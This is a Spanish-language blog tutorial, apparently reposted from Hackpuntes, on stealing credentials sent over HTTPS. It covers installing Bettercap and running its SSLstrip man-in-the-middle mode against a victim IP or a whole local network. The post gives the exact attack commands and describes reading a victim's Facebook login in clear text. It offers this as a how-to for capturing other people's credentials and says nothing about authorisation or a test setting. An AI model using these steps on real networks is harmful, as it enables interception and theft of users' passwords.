Obtener credenciales enviadas por HTTPs con SSLStrip y Bettercap

Aquí va un tutorial sobre cómo obtener las credenciales de sitios web que tengan cifrado SSL/TLS (HTTPS) mediante SSLstrip y el uso de un framework para realizar ataques MITM (ataque de hombre en el medio) llamado Bettercap.

¿Qué son las páginas HTTPs? ¿Qué diferencias hay con las HTTP?

Muchas veces, nos damos cuenta cuando accedemos a alguna web, que aparece un candado verde en la parte izquierda de la barra de direcciones, esto quiere decirnos, que nuestra conexión con el servidor es segura, es decir, el tráfico entre los dos puntos viaja cifrado.

Este tipo de páginas podemos encontrarlas en aquellas que requieran un nivel “extra” de seguridad debido a que se maneja información sensible como por ejemplo contraseñas, números de tarjeta de crédito o información confidencial.

Un ejemplo del uso de estas páginas pueden ser las web de los bancos, páginas dedicadas al comercio electrónico (tiendas online) o sitios populares como Google, Facebook o Twitter.

Podríamos decir que la diferencia entre HTTPs y HTTP es que la información se envía cifrada para evitar que un tercero capture el tráfico y vea lo que en ella se envía, el trafico HTTPs puede ser de igual manera capturado que el tráfico HTTP, pero no podríamos leer lo que contiene (en principio).

Bettercap y SSLstrip

Bettercap es un framework que se utiliza para realizar ataques MITM (Man In The Middle) o hombre en el medio, estos ataques consisten básicamente en interponerse entre 2 equipos para ver que datos se intercambian.

A continuación dejo unos links para ver en profundidad la herramienta.

Pero, ¿con interponerme en mitad de la conexión es suficiente?

Simplemente interponiéndonos en la conexión entre 2 equipos no es suficiente, necesitamos hacer uso de SSLstrip para poder leer lo que en ella se envía, más adelante lo veremos, pero aqui dejo un enlace hacia esta herramienta creada por Moxie Marlinspike.

Instalación de Bettercap.

Para instalar Bettercap, abrimos un terminal con permisos de superusuario y:

  1. Instalamos dependencias
apt-get install build-essential ruby-dev libpcap-dev

2. Clonamos el repositorio a nuestro equipo.

git clone https://github.com/evilsocket/bettercap

3. Nos posicionamos en la carpeta del proyecto.

cd bettercap

4. Construimos las gemas.

gem build bettercap.gemspec

5. Instalamos las gemas.

gem install bettercap*.gem

Uso de Bettercap y SSLstrip

Bettercap ya trae un módulo para realizar ataques SSLstrip, así que la utilizaremos para hacer un ataque de forma muy sencilla.

Abrimos una terminal y escribimos:

bettercap

Deberíamos de ver todos los dispositivos conectados a nuestra red. Visualizamos la IP de la víctima, que en mi caso sería la 192.168.100.251.

Luego, inicializamos Bettercap de la siguiente manera:

bettercap -T [IP VÍCTIMA] --proxy -P POST

En mi caso quedaría de la siguiente manera:

bettercap -T 192.168.100.251 –proxy -P POST

Si queremos que el ataque se realice a toda la red, simplemente no especificamos la IP de la víctima, y comenzará a captura todo el tráfico de red.

bettercap -T --proxy -P POST

Una vez la víctima acceda a cualquier página HTTPs (en este caso Facebook).

Podremos ver el tráfico descifrado, y por lo tanto, las credenciales en texto claro:

Fuente: Hackpuntes

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s